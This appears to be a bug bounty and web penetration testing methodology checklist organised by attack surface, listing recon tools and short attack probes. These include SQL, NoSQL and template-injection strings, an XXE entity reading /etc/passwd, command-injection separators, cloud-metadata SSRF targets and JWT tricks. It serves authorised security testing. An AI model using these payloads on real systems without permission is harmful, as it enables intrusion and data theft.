A practitioner-focused methodology and checklist for bug bounty hunting and web application penetration testing. Tight, tool-linked, and structured by attack surface.
For the condensed pre-flight checklist, see BB-Checklist.md.
- Recon & Asset Discovery
- Network Recon
- JavaScript & Client-Side Analysis
- API Testing
- Authentication
- Session Management
- Authorization (IDOR / BAC)
- Input Handling
- Business Logic
- Race Conditions
- HTTP Request Smuggling
- Cloud Misconfigurations
- Mobile (Quick Reference)
- Misc Checks
- Reporting
- Contributing
- License
- ASN & IP ranges — Amass, Asnlookup, Metabigor, bgp.he.net
- Acquisitions & subsidiaries — Crunchbase, SEC filings, Wikipedia
- Registrant pivots — ViewDNS Reverse Whois, WhoxyAPI
- Trademark / favicon pivots — Shodan favicon hash, FOFA, ZoomEye
- GitHub recon for org — trufflehog, github-search, gitleaks
- For each in-scope domain, drop to Medium Scope
- Passive subdomain enum — Amass, Subfinder, Assetfinder, crt.sh
- Active bruteforce — PureDNS, shuffledns + six2dez wordlist
- Permutations — Gotator, Ripgen, alterx
- Resolve & probe — dnsx, httpx (capture status, title, tech, CDN, CNAME)
- Subdomain takeover — Nuclei takeover templates, subzy, dnsReaper
- Cloud asset discovery — cloud_enum, S3Scanner
- Visual recon — gowitness, Aquatone, eyeballer
- Historical hostnames — waybackurls, gau, Chaos
- Port-scan all live hosts — see Network Recon
- Tech fingerprinting — httpx, whatweb, Wappalyzer
- Common files —
/robots.txt,/sitemap.xml,/.well-known/,/.git/,/.env,/server-status,/crossdomain.xml - Crawl + passive URL harvest — katana, hakrawler, gau, waybackurls
- Content discovery — feroxbuster, ffuf, dirsearch + OneListForAll
- Parameter discovery — Arjun, ParamSpider, x8
- CORS — CORScanner, Corsy; manually test
Origin: null, wildcard with credentials, regex bypasses - Nuclei sweep — nuclei with
-severity medium,high,critical
- Full TCP —
nmap -p- --min-rate 5000 -T4 <target>then-sCVon found ports - UDP top ports —
nmap -sU --top-ports 200 - Mass scan — masscan, naabu
- TLS/SSL — testssl.sh, sslyze
- Email spoofing — SpoofCheck (DMARC/SPF/DKIM)
- Service-specific — SMB, RDP, Redis, Memcached, MongoDB, Elasticsearch, Docker API exposure
- Collect JS — subjs, getJS, katana with
-jc - Endpoint extraction — LinkFinder, xnLinkFinder, JSluice
- Secrets in JS — trufflehog, SecretFinder, Nosey Parker
- Source map review — pull
.mapfiles, reconstruct original source with sourcemapper - DOM sinks — Burp DOM Invader, manual review of
eval,innerHTML,document.write,postMessage,location.* - Webpack analysis — webpack-exploder
- Spec discovery —
/swagger,/swagger.json,/api-docs,/openapi.json,/v1/,/v2/,/graphql - Verb tampering — try
PUT,DELETE,PATCH,OPTIONSonGETendpoints - Content-type confusion — swap
application/json↔application/xml↔application/x-www-form-urlencoded - Mass assignment — add
isAdmin,role,verified,userIdto payloads - Rate limit bypass —
X-Forwarded-For,X-Real-IP,X-Originating-IP, casing changes, null bytes, path/param mutation - Versioning — test old API versions (
/v1/may lack fixes in/v2/) - Kiterunner for content discovery on APIs (uses HTTP verbs and routes wordlists)
- Introspection —
{__schema{types{name fields{name}}}}; if disabled, try clairvoyance - IDE access —
/graphql,/graphiql,/playground,/console - Batching attacks — send array of queries to bypass rate limits / brute force
- Alias-based abuse — repeated aliased queries for brute force
- Field suggestion leak — typo in field name to leak schema
- Mutation enumeration — focus on
delete*,update*,create*Admin* - Tools — InQL, graphql-cop, graphw00f
- Username enumeration via login, register, password reset, response timing
- Password policy (length, complexity, common-password rejection, breach check)
- Brute force resilience — account lockout, IP throttling, CAPTCHA after N attempts
- 2FA — bypass via response manipulation, backup code abuse, race conditions, missing rate limits on OTP, OTP reuse
- Password reset — token entropy/reuse, host header injection,
email[]=victim&email[]=attacker, Unicode normalization - OAuth —
redirect_urivalidation (path traversal, open redirect, subdomain),stateparameter (CSRF), implicit flow leaks, scope upgrade - SAML — XML signature wrapping, comment injection,
xmlnsconfusion, SAML Raider - JWT —
alg: none,alg: HS256with public key as secret,kidinjection (path traversal, SQLi), JWK injection, weak HMAC secret (jwt_tool, hashcat) - SSO — host header / session confusion between SP and IdP
- Magic links — predictable tokens, no expiry, reuse, login CSRF
- Session fixation — does login regenerate the session ID?
- CSRF — token presence, validation, reuse across users,
SameSitecookie attribute - Cookie flags —
HttpOnly,Secure,SameSite,__Host-/__Secure-prefixes - Logout — server-side invalidation? Token usable post-logout?
- Concurrent sessions — does login N+1 kill session N?
- Timeout — idle vs absolute
- Session token entropy and predictability
- Horizontal — swap IDs (numeric, UUID, base64, hashed) between two test accounts
- Vertical — low-priv user accessing admin endpoints; check direct URL, not just UI
- Method-based — endpoint hidden from UI but reachable via direct request
- Parameter pollution —
?user=victim&user=attacker - ID encoding — try wrapping ID in array, JSON object, different encoding
- Mass IDOR — Autorize (Burp), AuthMatrix
- GUIDs / UUIDs — check for v1 (timestamp-predictable) vs v4 (random)
- Tenant isolation — multi-tenant apps: try IDs from tenant A while logged in as tenant B
- Reflected/stored — Dalfox, XSStrike, manual payload tuning
- DOM — Burp DOM Invader, manual sink analysis
- Blind XSS — XSS Hunter Express, Interactsh
- CSP bypass — review
Content-Security-Policy; look forunsafe-inline,unsafe-eval, overly broad CDNs, JSONP endpoints, csp-evaluator - Filter bypass — case, encoding, event handlers, SVG,
<details>,<dialog open ontoggle>, mutation XSS
- Manual probe —
','',",--,OR 1=1, time-based payloads - Automation — sqlmap with
--risk=3 --level=5(in scope only) - Blind boolean / time-based — when no output reflection
- NoSQL —
{"$ne": null},{"$gt": ""},{"$regex": ".*"}(MongoDB) - 2nd-order — payload stored then triggered elsewhere
- ORM-specific quirks — Hibernate HQL, Sequelize, Prisma
- Standard targets —
http://127.0.0.1,http://localhost,http://[::],http://0.0.0.0 - Cloud metadata — AWS
169.254.169.254, GCPmetadata.google.internal, Azure169.254.169.254/metadata/instance, IMDSv2 token flow - DNS rebinding — singularity
- Bypasses — decimal/octal IPs, URL parsers,
@confusion, redirect chains, gopher/file/dict schemes (Gopherus) - Blind SSRF — out-of-band via interactsh, Burp Collaborator
- Polyglot probe —
${{<%[%'"}}%\ - Engine-specific payloads — Jinja2
{{7*7}}, Twig{{7*'7'}}, Freemarker<#assign>, ERB<%= %> - tplmap for automation
- PortSwigger SSTI labs map almost 1:1 to real targets
- Classic —
<!ENTITY xxe SYSTEM "file:///etc/passwd"> - Blind — OOB DTD via Burp Collaborator
- Parameter entities, SVG upload XXE, DOCX/XLSX/ODT XXE, SOAP XXE
- Billion laughs / quadratic blowup for DoS (only if in scope)
../, encoded variants,....//, null byte (legacy), filter wrappers (php://filter/convert.base64-encode/resource=)- Log poisoning → RCE
- Wordlists — LFI-Payloads
- Separators —
;,&&,|,`,$(), newline - Blind — DNS/HTTP OOB callbacks
- commix for automation
- Client-side — pollute via URL/JSON, check sink in PP-finder or DOM Invader
- Server-side (Node.js) —
__proto__,constructor.prototypein JSON bodies - Gadgets per framework (Express, Mongoose, Lodash)
- Multi-step flow tampering — skip steps, replay, modify hidden state
- Price/quantity manipulation — negative numbers, decimal precision, currency confusion, integer overflow
- Coupon/voucher logic — stack multiple, reuse, race-apply
- Workflow bypass — KYC, age gates, terms acceptance
- Numeric edge cases —
0,-1,MAX_INT, very large floats, scientific notation - Client-side validation only — disable JS, intercept and modify
- File upload — extension/MIME/magic-byte mismatch, polyglots, double extension, SVG XSS, path traversal in filename, zip slip
- Burp Repeater "send group in parallel" / single-packet attack (HTTP/2)
- Turbo Intruder
race.pytemplate - High-value targets — coupon redemption, gift card claim, withdrawal, vote, like, follow, MFA verify
- Reference: PortSwigger's Smashing the state machine
- CL.TE / TE.CL / TE.TE / CL.CL detection — smuggler, Burp HTTP Request Smuggler
- HTTP/2 downgrade smuggling (H2.CL, H2.TE)
- Browser-powered ("client-side") smuggling
- Validate impact — cache poisoning, auth bypass, request hijacking
- S3 — public read/write, ACL misconfigs, bucket takeover (S3Scanner)
- GCP buckets — same idea,
storage.googleapis.com/<bucket> - Azure Blob —
<account>.blob.core.windows.net - Cloud metadata via SSRF — covered above
- IAM — overly permissive policies, leaked AWS keys (trufflehog)
- Lambda/Functions — env vars, source via console
- Misconfigured CloudFront / CloudFlare — origin IP disclosure (CloudFail)
- APK/IPA static — MobSF, apktool, jadx
- iOS — Frida, Objection, Cycript
- SSL pinning bypass — Frida scripts (frida-scripts)
- Hardcoded secrets — same JS-style hunt against decompiled source
- Deep links / URL schemes — intent redirection, WebView abuse
- Backup analysis —
adb backup, plist files on iOS
- Security headers —
Strict-Transport-Security,Content-Security-Policy,X-Frame-Options,X-Content-Type-Options,Referrer-Policy,Permissions-Policy(note: many of these are informational findings on most programs) - CAPTCHA — OCR (Tesseract), reuse of solved token, removal of CAPTCHA parameter, automation of audio CAPTCHA
- Open redirect — useful as chain primitive (OAuth, SSRF filter bypass)
- Cache poisoning — unkeyed headers, parameter cloaking (Param Miner)
- Web cache deception —
/account.php/nonexistent.css - Dependency confusion — internal package names published publicly on npm/PyPI
- Email injection — header injection in contact forms, SMTP smuggling
A solid report is often the gap between a bounty and a "won't fix":
- Clear, single-sentence title with impact
- Severity per program rules (avoid self-rating CVSS without justification)
- Steps to reproduce — numbered, copy-pasteable, no missing context
- Proof — screenshot or short video; redact your own creds
- Impact — what could an attacker actually do? Tie to the program's stated assets/data
- Remediation — short, suggestive, not prescriptive
- Don't include unrelated findings in one report — file separately
PRs welcome. Useful additions: new tools that meaningfully change a workflow, missing attack classes, real-world bypasses. Please keep entries tight and link to authoritative sources.
MIT — use freely, attribution appreciated.
This is a living document. Methodology evolves; treat it as a scaffold, not a script.